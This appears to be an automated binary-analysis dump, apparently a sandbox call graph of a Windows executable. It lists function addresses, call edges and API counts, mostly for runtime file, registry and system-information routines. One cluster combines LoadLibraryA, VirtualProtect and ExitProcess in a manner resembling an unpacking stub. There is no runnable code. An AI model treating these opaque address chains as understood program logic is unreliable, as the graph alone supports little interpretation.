99811->99812 99813 7b7e8c 59 API calls 99811->99813 99814 7b7b52 59 API calls 99812->99814 99813->99812 99815 814377 99814->99815 99816 814387 99815->99816 99818 7b7e8c 59 API calls 99815->99818 99817 7b81a7 59 API calls 99816->99817 99819 814393 99817->99819 99818->99816 99820 7b7c8e 59 API calls 99819->99820 99821 81439f 99820->99821 100374 81445f 59 API calls 99821->100374 99823 8143ae 100375 81445f 59 API calls 99823->100375 99825 8143c1 99826 7b7b52 59 API calls 99825->99826 99827 8143cb 99826->99827 99828 8143d0 99827->99828 99829 8143e2 99827->99829 99830 7b7e0b 59 API calls 99828->99830 99831 7b7b52 59 API calls 99829->99831 99833 8143dd 99830->99833 99832 8143eb 99831->99832 99834 814409 99832->99834 99835 7b7e0b 59 API calls 99832->99835 99836 7b7c8e 59 API calls 99833->99836 99837 7b7c8e 59 API calls 99834->99837 99835->99833 99836->99834 99837->99838 99838->99750 99840 8193ec __ftell_nolock 99839->99840 99841 7d0ff6 Mailbox 59 API calls 99840->99841 99842 819449 99841->99842 99843 7b538e 59 API calls 99842->99843 99844 819453 99843->99844 99845 8191e9 GetSystemTimeAsFileTime 99844->99845 99846 81945e 99845->99846 99847 7b5045 85 API calls 99846->99847 99848 819471 _wcscmp 99847->99848 99849 819542 99848->99849 99850 819495 99848->99850 99851 8199be 96 API calls 99849->99851 100406 8199be 99850->100406 99867 81950e _wcscat 99851->99867 99855 7b506b 74 API calls 99857 819567 99855->99857 99856 81954b 99856->99756 99858 7b506b 74 API calls 99857->99858 99859 819577 99858->99859 99861 7b506b 74 API calls 99859->99861 99860 8194c3 _wcscat _wcscpy 100413 7d432e 58 API calls __wsplitpath_helper 99860->100413 99863 819592 99861->99863 99864 7b506b 74 API calls 99863->99864 99865 8195a2 99864->99865 99866 7b506b 74 API calls 99865->99866 99868 8195bd 99866->99868 99867->99855 99867->99856 99869 7b506b 74 API calls 99868->99869 99870 8195cd 99869->99870 99871 7b506b 74 API calls 99870->99871 99872 8195dd 99871->99872 99873 7b506b 74 API calls 99872->99873 99874 8195ed 99873->99874 100376 819b6d GetTempPathW GetTempFileNameW 99874->100376 99876 8195f9 99877 7d548b 115 API calls 99876->99877 99878 81960a 99877->99878 99878->99856 99881 7b506b 74 API calls 99878->99881 99892 8196c4 99878->99892 100377 7d4a93 99878->100377 99880 8196cf 99882 8196d5 DeleteFileW 99880->99882 99883 8196e9 99880->99883 99881->99878 99882->99856 99884 81978f CopyFileW 99883->99884 99888 8196f3 _wcsncpy 99883->99888 99885 8197a5 DeleteFileW 99884->99885 99886 8197b7 DeleteFileW 99884->99886 99885->99856 100414 818d90 99888->100414 100390 7d55d6 99892->100390 99894->99683 99895->99719 99896->99733 99898 7b4fbb 99897->99898 99899 7b4fb4 99897->99899 99901 7b4fdb FreeLibrary 99898->99901 99902 7b4fca 99898->99902 99900 7d55d6 __fcloseall 83 API calls 99899->99900 99900->99898 99901->99902 99902->99699 99952 7b4d61 99903->99952 99906 7b4d61 2 API calls 99909 7b4d3a 99906->99909 99907 7b4d4a FreeLibrary 99908 7b4d53 99907->99908 99910 7d548b 99908->99910 99909->99907 99909->99908 99956 7d54a0 99910->99956 99912 7b4f5c 99912->99766 99912->99767 100112 7b4d94 99913->100112 99916 7b4ced 99917 7b4d08 99916->99917 99918 7b4cff FreeLibrary 99916->99918 99920 7b4dd0 99917->99920 99918->99917 99919 7b4d94 2 API calls 99919->99916 99921 7d0ff6 Mailbox 59 API calls 99920->99921 99922 7b4de5 99921->99922 99923 7b538e 59 API calls 99922->99923 99924 7b4df1 _memmove 99923->99924 99925 7b4e2c 99924->99925 99926 7b4ee9 99924->99926 99927 7b4f21 99924->99927 99928 7b5027 69 API calls 99925->99928 100116 7b4fe9 99926->100116 100128 819ba5 95 API calls 99927->100128 99936 7b4e35 99928->99936 99931 7b506b 74 API calls 99931->99936 99933 7b4ec9 99933->99774 99934 7edcd0 99935 7b5045 85 API calls 99934->99935 99937 7edce4 99935->99937 99936->99931 99936->99933 99936->99934 100123 7b5045 99936->100123 99938 7b506b 74 API calls 99937->99938 99938->99933 99940 7b507d 99939->99940 99941 7eddf6 99939->99941 100152 7d5812 99940->100152 99944 819393 100351 8191e9 99944->100351 99946 8193a9 99946->99782 99948 7b5036 99947->99948 99951 7eddb9 99947->99951 100356 7d5e90 99948->100356 99950 7b503e 99953 7b4d2e 99952->99953 99954 7b4d6a LoadLibraryA 99952->99954 99953->99906 99953->99909 99954->99953 99955 7b4d7b GetProcAddress 99954->99955 99955->99953 99959 7d54ac __commit 99956->99959 99957 7d54bf 100005 7d8d68 58 API calls __getptd_noexit 99957->100005 99959->99957 99961 7d54f0 99959->99961 99960 7d54c4 100006 7d8ff6 9 API calls __commit 99960->100006 99975 7e0738 99961->99975 99964 7d54f5 99965 7d54fe 99964->99965 99966 7d550b 99964->99966 100007 7d8d68 58 API calls __getptd_noexit 99965->100007 99968 7d5535 99966->99968 99969 7d5515 99966->99969 99990 7e0857 99968->99990 100008 7d8d68 58 API calls __getptd_noexit 99969->100008 99970 7d54cf __commit @_EH4_CallFilterFunc@8 99970->99912 99976 7e0744 __commit 99975->99976 99977 7d9e4b __lock 58 API calls 99976->99977 99988 7e0752 99977->99988 99978 7e07c6 100010 7e084e 99978->100010 99979 7e07cd 99981 7d8a5d __malloc_crt 58 API calls 99979->99981 99983 7e07d4 99981->99983 99982 7e0843 __commit 99982->99964 99983->99978 100015 7da06b InitializeCriticalSectionAndSpinCount 99983->100015 99986 7d9ed3 __mtinitlocknum 58 API calls 99986->99988 99987 7e07fa RtlEnterCriticalSection 99987->99978 99988->99978 99988->99979 99988->99986 100013 7d6e8d 59 API calls __lock 99988->100013 100014 7d6ef7 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 99988->100014 99998 7e0877 __wopenfile 99990->99998 99991 7e0891 100020 7d8d68 58 API calls __getptd_noexit 99991->100020 99993 7e0896 100021 7d8ff6 9 API calls __commit 99993->100021 99995 7e0aaf 100017 7e87f1 99995->100017 99996 7d5540 100009 7d5562 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 99996->100009 99998->99991 100004 7e0a4c 99998->100004 100022 7d3a0b 60 API calls 2 library calls 99998->100022 100000 7e0a45 100000->100004 100023 7d3a0b 60 API calls 2 library calls 100000->100023 100002 7e0a64 100002->100004 100024 7d3a0b 60 API calls 2 library calls 100002->100024 100004->99991 100004->99995 100005->99960 100006->99970 100007->99970 100008->99970 100009->99970 100016 7d9fb5 RtlLeaveCriticalSection 100010->100016 100012 7e0855 100012->99982 100013->99988 100014->99988 100015->99987 100016->100012 100025 7e7fd5 100017->100025 100019 7e880a 100019->99996 100020->99993 100021->99996 100022->100000 100023->100002 100024->100004 100028 7e7fe1 __commit 100025->100028 100026 7e7ff7 100109 7d8d68 58 API calls __getptd_noexit 100026->100109 100028->100026 100030 7e802d 100028->100030 100029 7e7ffc 100110 7d8ff6 9 API calls __commit 100029->100110 100036 7e809e 100030->100036 100033 7e8049 100111 7e8072 RtlLeaveCriticalSection __unlock_fhandle 100033->100111 100035 7e8006 __commit 100035->100019 100037 7e80be 100036->100037 100038 7d471a __wsopen_nolock 58 API calls 100037->100038 100041 7e80da 100038->100041 100039 7d9006 __invoke_watson 8 API calls 100040 7e87f0 100039->100040 100043 7e7fd5 __wsopen_helper 103 API calls 100040->100043 100042 7e8114 100041->100042 100049 7e8137 100041->100049 100108 7e8211 100041->100108 100044 7d8d34 __commit 58 API calls 100042->100044 100045 7e880a 100043->100045 100046 7e8119 100044->100046 100045->100033 100047 7d8d68 __commit 58 API calls 100046->100047 100048 7e8126 100047->100048 100051 7d8ff6 __commit 9 API calls 100048->100051 100050 7e81f5 100049->100050 100058 7e81d3 100049->100058 100052 7d8d34 __commit 58 API calls 100050->100052 100053 7e8130 100051->100053 100054 7e81fa 100052->100054 100053->100033 100055 7d8d68 __commit 58 API calls 100054->100055 100056 7e8207 100055->100056 100057 7d8ff6 __commit 9 API calls 100056->100057 100057->100108 100059 7dd4d4 __alloc_osfhnd 61 API calls 100058->100059 100060 7e82a1 100059->100060 100061 7e82ce 100060->100061 100062 7e82ab 100060->100062 100064 7e7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100061->100064 100063 7d8d34 __commit 58 API calls 100062->100063 100065 7e82b0 100063->100065 100072 7e82f0 100064->100072 100067 7d8d68 __commit 58 API calls 100065->100067 100066 7e836e GetFileType 100070 7e83bb 100066->100070 100071 7e8379 GetLastError 100066->100071 100069 7e82ba 100067->100069 100068 7e833c GetLastError 100073 7d8d47 __dosmaperr 58 API calls 100068->100073 100074 7d8d68 __commit 58 API calls 100069->100074 100080 7dd76a __set_osfhnd 59 API calls 100070->100080 100075 7d8d47 __dosmaperr 58 API calls 100071->100075 100072->100066 100072->100068 100076 7e7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100072->100076 100077 7e8361 100073->100077 100074->100053 100078 7e83a0 CloseHandle 100075->100078 100079 7e8331 100076->100079 100083 7d8d68 __commit 58 API calls 100077->100083 100078->100077 100081 7e83ae 100078->100081 100079->100066 100079->100068 100085 7e83d9 100080->100085 100082 7d8d68 __commit 58 API calls 100081->100082 100084 7e83b3 100082->100084 100083->100108 100084->100077 100086 7e8594 100085->100086 100087 7e1b11 __lseeki64_nolock 60 API calls 100085->100087 100091 7e845a 100085->100091 100088 7e8767 CloseHandle 100086->100088 100086->100108 100089 7e8443 100087->100089 100090 7e7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100088->100090 100089->100091 100094 7d8d34 __commit 58 API calls 100089->100094 100093 7e878e 100090->100093 100091->100086 100092 7e10ab 70 API calls __read_nolock 100091->100092 100098 7e0d2d __close_nolock 61 API calls 100091->100098 100100 7e99f2 __chsize_nolock 82 API calls 100091->100100 100102 7ddac6 __write 78 API calls 100091->100102 100103 7e8611 100091->100103 100107 7e1b11 60 API calls __lseeki64_nolock 100091->100107 100092->100091 100095 7e8796 GetLastError 100093->100095 100101 7e87c2 100093->100101 100094->100091 100096 7d8d47 __dosmaperr 58 API calls 100095->100096 100097 7e87a2 100096->100097 100099 7dd67d __free_osfhnd 59 API calls 100097->100099 100098->100091 100099->100101 100100->100091 100101->100108 100102->100091 100104 7e0d2d __close_nolock 61 API calls 100103->100104 100105 7e8618 100104->100105 100106 7d8d68 __commit 58 API calls 100105->100106 100106->100108 100107->100091 100108->100039 100109->100029 100110->100035 100111->100035 100113 7b4ce1 100112->100113 100114 7b4d9d LoadLibraryA 100112->100114 100113->99916 100113->99919 100114->100113 100115 7b4dae GetProcAddress 100114->100115 100115->100113 100117 7b4fff 100116->100117 100118 7b5003 FindResourceExW 100117->100118 100119 7b5020 100117->100119 100118->100119 100120 7edd5c LoadResource 100118->100120 100119->99925 100120->100119 100121 7edd71 SizeofResource 100120->100121 100121->100119 100122 7edd85 LockResource 100121->100122 100122->100119 100124 7eddd4 100123->100124 100125 7b5054 100123->100125 100129 7d5a7d 100125->100129 100127 7b5062 100127->99936 100128->99925 100130 7d5a89 __commit 100129->100130 100131 7d5a9b 100130->100131 100132 7d5ac1 100130->100132 100142 7d8d68 58 API calls __getptd_noexit 100131->100142 100144 7d6e4e 100132->100144 100135 7d5aa0 100143 7d8ff6 9 API calls __commit 100135->100143 100139 7d5ad6 100151 7d5af8 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 100139->100151 100141 7d5aab __commit 100141->100127 100142->100135 100143->100141 100145 7d6e5e 100144->100145 100146 7d6e80 RtlEnterCriticalSection 100144->100146 100145->100146 100147 7d6e66 100145->100147 100148 7d5ac7 100146->100148 100149 7d9e4b __lock 58 API calls 100147->100149 100150 7d59ee 83 API calls 5 library calls 100148->100150 100149->100148 100150->100139 100151->100141 100155 7d582d 100152->100155 100154 7b508e 100154->99944 100156 7d5839 __commit 100155->100156 100157 7d587c 100156->100157 100158 7d584f _memset 100156->100158 100159 7d5874 __commit 100156->100159 100160 7d6e4e __lock_file 59 API calls 100157->100160 100182 7d8d68 58 API calls __getptd_noexit 100158->100182 100159->100154 100162 7d5882 100160->100162 100168 7d564d 100162->100168 100163 7d5869 100183 7d8ff6 9 API calls __commit 100163->100183 100169 7d5683 100168->100169 100171 7d5668 _memset 100168->100171 100184 7d58b6 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 100169->100184 100170 7d5673 100280 7d8d68 58 API calls __getptd_noexit 100170->100280 100171->100169 100171->100170 100179 7d56c3 100171->100179 100173 7d5678 100281 7d8ff6 9 API calls __commit 100173->100281 100176 7d57d4 _memset 100283 7d8d68 58 API calls __getptd_noexit 100176->100283 100179->100169 100179->100176 100185 7d4916 100179->100185 100192 7e10ab 100179->100192 100260 7e0df7 100179->100260 100282 7e0f18 58 API calls 3 library calls 100179->100282 100182->100163 100183->100159 100184->100159 100186 7d4935 100185->100186 100187 7d4920 100185->100187 100186->100179 100284 7d8d68 58 API calls __getptd_noexit 100187->100284 100189 7d4925 100285 7d8ff6 9 API calls __commit 100189->100285 100191 7d4930 100191->100179 100193 7e10cc 100192->100193 100194 7e10e3 100192->100194 100295 7d8d34 58 API calls __getptd_noexit 100193->100295 100196 7e181b 100194->100196 100200 7e111d 100194->100200 100310 7d8d34 58 API calls __getptd_noexit 100196->100310 100197 7e10d1 100296 7d8d68 58 API calls __getptd_noexit 100197->100296 100202 7e1125 100200->100202 100209 7e113c 100200->100209 100201 7e1820 100311 7d8d68 58 API calls __getptd_noexit 100201->100311 100297 7d8d34 58 API calls __getptd_noexit 100202->100297 100204 7e1131 100312 7d8ff6 9 API calls __commit 100204->100312 100205 7e10d8 100205->100179 100207 7e112a 100298 7d8d68 58 API calls __getptd_noexit 100207->100298 100209->100205 100210 7e1151 100209->100210 100212 7e116b 100209->100212 100214 7e1189 100209->100214 100299 7d8d34 58 API calls __getptd_noexit 100210->100299 100212->100210 100228 7e1176 100212->100228 100215 7d8a5d __malloc_crt 58 API calls 100214->100215 100216 7e1199 100215->100216 100218 7e11bc 100216->100218 100219 7e11a1 100216->100219 100302 7e1b11 60 API calls 2 library calls 100218->100302 100300 7d8d68 58 API calls __getptd_noexit 100219->100300 100220 7e128a 100222 7e1303 ReadFile 100220->100222 100227 7e12a0 GetConsoleMode 100220->100227 100225 7e1325 100222->100225 100226 7e17e3 GetLastError 100222->100226 100224 7e11a6 100301 7d8d34 58 API calls __getptd_noexit 100224->100301 100225->100226 100234 7e12f5 100225->100234 100230 7e12e3 100226->100230 100231 7e17f0 100226->100231 100232 7e12b4 100227->100232 100233 7e1300 100227->100233 100286 7e5ebb 100228->100286 100242 7e12e9 100230->100242 100303 7d8d47 58 API calls 2 library calls 100230->100303 100308 7d8d68 58 API calls __getptd_noexit 100231->100308 100232->100233 100236 7e12ba ReadConsoleW 100232->100236 100233->100222 100234->100242 100243 7e135a 100234->100243 100252 7e15c7 100234->100252 100236->100234 100238 7e12dd GetLastError 100236->100238 100237 7e17f5 100309 7d8d34 58 API calls __getptd_noexit 100237->100309 100238->100230 100241 7d2f95 _free 58 API calls 100241->100205 100242->100205 100242->100241 100244 7e13c6 ReadFile 100243->100244 100250 7e1447 100243->100250 100246 7e13e7 GetLastError 100244->100246 100258 7e13f1 100244->100258 100246->100258 100247 7e1504 100254 7e14b4 MultiByteToWideChar 100247->100254 100306 7e1b11 60 API calls 2 library calls 100247->100306 100248 7e14f4 100305 7d8d68 58 API calls __getptd_noexit 100248->100305 100249 7e16cd ReadFile 100253 7e16f0 GetLastError 100249->100253 100259 7e16fe 100249->100259 100250->100242 100250->100247 100250->100248 100250->100254 100252->100242 100252->100249 100253->100259 100254->100238 100254->100242 100258->100243 100304 7e1b11 60 API calls 2 library calls 100258->100304 100259->100252 100307 7e1b11 60 API calls 2 library calls 100259->100307 100261 7e0e02 100260->100261 100266 7e0e17 100260->100266 100346 7d8d68 58 API calls __getptd_noexit 100261->100346 100263 7e0e12 100263->100179 100264 7e0e07 100347 7d8ff6 9 API calls __commit 100264->100347 100266->100263 100267 7e0e4c 100266->100267 100348 7e6234 100266->100348 100269 7d4916 _fprintf 58 API calls 100267->100269 100270 7e0e60 100269->100270 100313 7e0f97 100270->100313 100272 7e0e67 100272->100263 100273 7d4916 _fprintf 58 API calls 100272->100273 100274 7e0e8a 100273->100274 100274->100263 100275 7d4916 _fprintf 58 API calls 100274->100275 100276 7e0e96 100275->100276 100276->100263 100277 7d4916 _fprintf 58 API calls 100276->100277 100278 7e0ea3 100277->100278 100279 7d4916 _fprintf 58 API calls 100278->100279 100279->100263 100280->100173 100281->100169 100282->100179 100283->100173 100284->100189 100285->100191 100287 7e5ec6 100286->100287 100288 7e5ed3 100286->100288 100289 7d8d68 __commit 58 API calls 100287->100289 100291 7e5edf 100288->100291 100292 7d8d68 __commit 58 API calls 100288->100292 100290 7e5ecb 100289->100290 100290->100220 100291->100220 100293 7e5f00 100292->100293 100294 7d8ff6 __commit 9 API calls 100293->100294 100294->100290 100295->100197 100296->100205 100297->100207 100298->100204 100299->100207 100300->100224 100301->100205 100302->100228 100303->100242 100304->100258 100305->100242 100306->100254 100307->100259 100308->100237 100309->100242 100310->100201 100311->100204 100312->100205 100314 7e0fa3 __commit 100313->100314 100315 7e0fc7 100314->100315 100316 7e0fb0 100314->100316 100318 7e108b 100315->100318 100321 7e0fdb 100315->100321 100317 7d8d34 __commit 58 API calls 100316->100317 100320 7e0fb5 100317->100320 100319 7d8d34 __commit 58 API calls 100318->100319 100322 7e0ffe 100319->100322 100323 7d8d68 __commit 58 API calls 100320->100323 100324 7e0ff9 100321->100324 100325 7e1006 100321->100325 100331 7d8d68 __commit 58 API calls 100322->100331 100326 7e0fbc __commit 100323->100326 100327 7d8d34 __commit 58 API calls 100324->100327 100328 7e1028 100325->100328 100329 7e1013 100325->100329 100326->100272 100327->100322 100330 7dd446 ___lock_fhandle 59 API calls 100328->100330 100332 7d8d34 __commit 58 API calls 100329->100332 100333 7e102e 100330->100333 100334 7e1020 100331->100334 100335 7e1018 100332->100335 100337 7e1054 100333->100337 100338 7e1041 100333->100338 100340 7d8ff6 __commit 9 API calls 100334->100340 100336 7d8d68 __commit 58 API calls 100335->100336 100336->100334 100341 7d8d68 __commit 58 API calls 100337->100341 100339 7e10ab __read_nolock 70 API calls 100338->100339 100342 7e104d 100339->100342 100340->100326 100343 7e1059 100341->100343 100345 7e1083 __read RtlLeaveCriticalSection 100342->100345 100344 7d8d34 __commit 58 API calls 100343->100344 100344->100342 100345->100326 100346->100264 100347->100263 100349 7d8a5d __malloc_crt 58 API calls 100348->100349 100350 7e6249 100349->100350 100350->100267 100354 7d543a GetSystemTimeAsFileTime 100351->100354 100353 8191f8 100353->99946 100355 7d5468 __aulldiv 100354->100355 100355->100353 100357 7d5e9c __commit 100356->100357 100358 7d5eae 100357->100358 100359 7d5ec3 100357->100359 100370 7d8d68 58 API calls __getptd_noexit 100358->100370 100361 7d6e4e __lock_file 59 API calls 100359->100361 100363 7d5ec9 100361->100363 100362 7d5eb3 100371 7d8ff6 9 API calls __commit 100362->100371 100372 7d5b00 67 API calls 6 library calls 100363->100372 100366 7d5ebe __commit 100366->99950 100367 7d5ed4 100373 7d5ef4 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 100367->100373 100369 7d5ee6 100369->100366 100370->100362 100371->100366 100372->100367 100373->100369 100374->99823 100375->99825 100376->99876 100378 7d4a9f __commit 100377->100378 100379 7d4abd 100378->100379 100380 7d4ad5 100378->100380 100382 7d4acd __commit 100378->100382 100457 7d8d68 58 API calls __getptd_noexit 100379->100457 100383 7d6e4e __lock_file 59 API calls 100380->100383 100382->99878 100385 7d4adb 100383->100385 100384 7d4ac2 100458 7d8ff6 9 API calls __commit 100384->100458 100445 7d493a 100385->100445 100391 7d55e2 __commit 100390->100391 100392 7d560e 100391->100392 100393 7d55f6 100391->100393 100396 7d6e4e __lock_file 59 API calls 100392->100396 100399 7d5606 __commit 100392->100399 100642 7d8d68 58 API calls __getptd_noexit 100393->100642 100395 7d55fb 100643 7d8ff6 9 API calls __commit 100395->100643 100398 7d5620 100396->100398 100626 7d556a 100398->100626 100399->99880 100410 8199d2 __tzset_nolock _wcscmp 100406->100410 100407 81949a 100407->99856 100412 7d432e 58 API calls __wsplitpath_helper 100407->100412 100408 7b506b 74 API calls 100408->100410 100409 819393 GetSystemTimeAsFileTime 100409->100410 100410->100407 100410->100408 100410->100409 100411 7b5045 85 API calls 100410->100411 100411->100410 100412->99860 100413->99867 100448 7d4949 100445->100448 100452 7d4967 100445->100452 100446 7d4957 100509 7d8d68 58 API calls __getptd_noexit 100446->100509 100448->100446 100451 7d4981 _memmove 100448->100451 100448->100452 100449 7d495c 100451->100452 100455 7d4916 _fprintf 58 API calls 100451->100455 100460 7ddac6 100451->100460 100488 7db05e 100451->100488 100511 7d4c6d 100451->100511 100459 7d4b0d RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 100452->100459 100455->100451 100457->100384 100458->100382 100459->100382 100461 7ddad2 __commit 100460->100461 100489 7d4916 _fprintf 58 API calls 100488->100489 100509->100449 100513 7d4ca4 100511->100513 100513->100451 100627 7d5579 100626->100627 100630 7d558d 100626->100630 100675 7d8d68 58 API calls __getptd_noexit 100627->100675 100629 7d5589 100644 7d5645 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 100629->100644 100630->100629 100632 7d4c6d __flush 78 API calls 100630->100632 100631 7d557e 100634 7d5599 100632->100634 100642->100395 100643->100399 100644->100399 100675->100631 100763 806641 100762->100763 100764 80665e 100762->100764 100763->100764 100766 806621 59 API calls Mailbox 100763->100766 100764->99280 100766->100763 100767 7f0226 100768 7bade2 Mailbox 100767->100768 100770 7f0c86 100768->100770 100772 7f0c8f 100768->100772 100774 7f00e0 VariantClear 100768->100774 100775 7bb6c1 100768->100775 100777 82e237 130 API calls 100768->100777 100778 81d2e6 101 API calls 100768->100778 100779 7c2123 95 API calls 100768->100779 100780 82474d 340 API calls 100768->100780 100781 7b9df0 59 API calls Mailbox 100768->100781 100782 807405 59 API calls 100768->100782 100771 8066f4 Mailbox 59 API calls 100770->100771 100771->100772 100774->100768 100783 81a0b5 89 API calls 4 library calls 100775->100783 100777->100768 100778->100768 100779->100768 100780->100768 100781->100768 100782->100768 100783->100770 100784 8d7080 100785 8d7090 100784->100785 100786 8d71aa LoadLibraryA 100785->100786 100790 8d71ef VirtualProtect VirtualProtect 100785->100790 100787 8d71c1 100786->100787 100787->100785 100789 8d71d3 GetProcAddress 100787->100789 100789->100787 100792 8d71e9 ExitProcess 100789->100792 100791 8d7254 100790->100791 100791->100791 100793 7b1066 100798 7bf8cf 100793->100798 100795 7b106c 100796 7d2f80 __cinit 67 API calls 100795->100796 100797 7b1076 100796->100797 100799 7bf8f0 100798->100799 100831 7d0143 100799->100831 100803 7bf937 100804 7b77c7 59 API calls 100803->100804 100805 7bf941 100804->100805 100806 7b77c7 59 API calls 100805->100806 100807 7bf94b 100806->100807 100808 7b77c7 59 API calls 100807->100808 100809 7bf955 100808->100809 100810 7b77c7 59 API calls 100809->100810 100811 7bf993 100810->100811 100812 7b77c7 59 API calls 100811->100812 100813 7bfa5e 100812->100813 100841 7c60e7 100813->100841 100817 7bfa90 100818 7b77c7 59 API calls 100817->100818 100819 7bfa9a 100818->100819 100869 7cffde 100819->100869 100821 7bfae1 100822 7bfaf1 GetStdHandle 100821->100822 100823 7bfb3d 100822->100823 100824 7f49d5 100822->100824 100825 7bfb45 OleInitialize 100823->100825 100824->100823 100826 7f49de 100824->100826 100825->100795 100876 816dda 64 API calls Mailbox 100826->100876 100828 7f49e5 100877 8174a9 CreateThread 100828->100877 100830 7f49f1 CloseHandle 100830->100825 100878 7d021c 100831->100878 100834 7d021c 59 API calls 100835 7d0185 100834->100835 100836 7b77c7 59 API calls 100835->100836 100837 7d0191 100836->100837 100838 7b7d2c 59 API calls 100837->100838 100839 7bf8f6 100838->100839 100840 7d03a2 6 API calls 100839->100840 100840->100803 100842 7b77c7 59 API calls 100841->100842 100843 7c60f7 100842->100843 100844 7b77c7 59 API calls 100843->100844 100845 7c60ff 100844->100845 100885 7c5bfd 100845->100885 100848 7c5bfd 59 API calls 100849 7c610f 100848->100849 100850 7b77c7 59 API calls 100849->100850 100851 7c611a 100850->100851 100852 7d0ff6 Mailbox 59 API calls 100851->100852 100853 7bfa68 100852->100853 100854 7c6259 100853->100854 100855 7c6267 100854->100855 100856 7b77c7 59 API calls 100855->100856 100857 7c6272 100856->100857 100858 7b77c7 59 API calls 100857->100858 100859 7c627d 100858->100859 100860 7b77c7 59 API calls 100859->100860 100861 7c6288 100860->100861 100862 7b77c7 59 API calls 100861->100862 100863 7c6293 100862->100863 100864 7c5bfd 59 API calls 100863->100864 100865 7c629e 100864->100865 100866 7d0ff6 Mailbox 59 API calls 100865->100866 100867 7c62a5 RegisterClipboardFormatW 100866->100867 100867->100817 100870 7cffee 100869->100870 100871 805cc3 100869->100871 100872 7d0ff6 Mailbox 59 API calls 100870->100872 100888 819d71 60 API calls 100871->100888 100874 7cfff6 100872->100874 100874->100821 100875 805cce 100876->100828 100877->100830 100889 81748f 65 API calls 100877->100889 100879 7b77c7 59 API calls 100878->100879 100880 7d0227 100879->100880 100881 7b77c7 59 API calls 100880->100881 100882 7d022f 100881->100882 100883 7b77c7 59 API calls 100882->100883 100884 7d017b 100883->100884 100884->100834 100886 7b77c7 59 API calls 100885->100886 100887 7c5c05 100886->100887 100887->100848 100888->100875 100890 7b1016 100895 7b4ad2 100890->100895 100893 7d2f80 __cinit 67 API calls 100894 7b1025 100893->100894 100896 7d0ff6 Mailbox 59 API calls 100895->100896 100897 7b4ada 100896->100897 100898 7b101b 100897->100898 100902 7b4a94 100897->100902 100898->100893 100903 7b4a9d 100902->100903 100904 7b4aaf 100902->100904 100905 7d2f80 __cinit 67 API calls 100903->100905 100906 7b4afe 100904->100906 100905->100904 100907 7b77c7 59 API calls 100906->100907 100908 7b4b16 GetVersionExW 100907->100908 100909 7b7d2c 59 API calls 100908->100909 100910 7b4b59 100909->100910 100911 7b7e8c 59 API calls 100910->100911 100914 7b4b86 100910->100914 100912 7b4b7a 100911->100912 100913 7b7886 59 API calls 100912->100913 100913->100914 100915 7edc8d 100914->100915 100916 7b4bf1 GetCurrentProcess IsWow64Process 100914->100916 100917 7b4c0a 100916->100917 100918 7b4c89 GetSystemInfo 100917->100918 100919 7b4c20 100917->100919 100920 7b4c56 100918->100920 100930 7b4c95 100919->100930 100920->100898 100923 7b4c7d GetSystemInfo 100926 7b4c47 100923->100926 100924 7b4c32 100925 7b4c95 2 API calls 100924->100925 100927 7b4c3a GetNativeSystemInfo 100925->100927 100926->100920 100928 7b4c4d FreeLibrary 100926->100928 100927->100926 100928->100920 100931 7b4c2e 100930->100931 100932 7b4c9e LoadLibraryA 100930->100932 100931->100923 100931->100924 100932->100931 100933 7b4caf GetProcAddress 100932->100933 100933->100931 100934 7b1055 100939 7b2649 100934->100939 100937 7d2f80 __cinit 67 API calls 100938 7b1064 100937->100938 100940 7b77c7 59 API calls 100939->100940 100941 7b26b7 100940->100941 100946 7b3582 100941->100946 100944 7b2754 100945 7b105a 100944->100945 100949 7b3416 59 API calls 2 library calls 100944->100949 100945->100937 100950 7b35b0 100946->100950 100949->100944 100951 7b35a1 100950->100951 100952 7b35bd 100950->100952 100951->100944 100952->100951 100953 7b35c4 RegOpenKeyExW 100952->100953 100953->100951 100954 7b35de RegQueryValueExW 100953->100954 100955 7b35ff 100954->100955 100956 7b3614 RegCloseKey 100954->100956 100955->100956 100956->100951 100957 7d7e93 100958 7d7e9f __commit 100957->100958 100994 7da048 GetStartupInfoW 100958->100994 100961 7d7ea4 100996 7d8dbc GetProcessHeap 100961->100996 100962 7d7f07 100997 7d9d26 100962->100997 100963 7d7efc 100963->100962 101079 7d7fe3 58 API calls 3 library calls 100963->101079 100966 7d7f0d 100967 7d7f18 __RTC_Initialize 100966->100967 101080 7d7fe3 58 API calls 3 library calls 100966->101080 101018 7dd812 100967->101018 100970 7d7f27 100971 7d7f33 GetCommandLineW 100970->100971 101081 7d7fe3 58 API calls 3 library calls 100970->101081 101037 7e5173 GetEnvironmentStringsW 100971->101037 100974 7d7f32 100974->100971 100977 7d7f4d 100978 7d7f58 100977->100978 101082 7d32f5 58 API calls 3 library calls 100977->101082 101047 7e4fa8 100978->101047 100981 7d7f5e 100982 7d7f69 100981->100982 101083 7d32f5 58 API calls 3 library calls 100981->101083 101061 7d332f 100982->101061 100985 7d7f71 100986 7d7f7c __wwincmdln 100985->100986 101084 7d32f5 58 API calls 3 library calls 100985->101084 101067 7b492e 100986->101067 100989 7d7f90 100990 7d7f9f 100989->100990 101085 7d3598 58 API calls _doexit 100989->101085 101086 7d3320 58 API calls _doexit 100990->101086 100993 7d7fa4 __commit 100995 7da05e 100994->100995 100995->100961 100996->100963 101087 7d33c7 36 API calls 2 library calls 100997->101087 100999 7d9d2b 101088 7d9f7c InitializeCriticalSectionAndSpinCount __getstream 100999->101088 101001 7d9d30 101002 7d9d34 101001->101002 101090 7d9fca TlsAlloc 101001->101090 101089 7d9d9c 61 API calls 2 library calls 101002->101089 101005 7d9d39 101005->100966 101006 7d9d46 101006->101002 101007 7d9d51 101006->101007 101091 7d8a15 101007->101091 101010 7d9d93 101099 7d9d9c 61 API calls 2 library calls 101010->101099 101013 7d9d72 101013->101010 101015 7d9d78 101013->101015 101014 7d9d98 101014->100966 101098 7d9c73 58 API calls 4 library calls 101015->101098 101017 7d9d80 GetCurrentThreadId 101017->100966 101019 7dd81e __commit 101018->101019 101020 7d9e4b __lock 58 API calls 101019->101020 101021 7dd825 101020->101021 101022 7d8a15 __calloc_crt 58 API calls 101021->101022 101024 7dd836 101022->101024 101023 7dd8a1 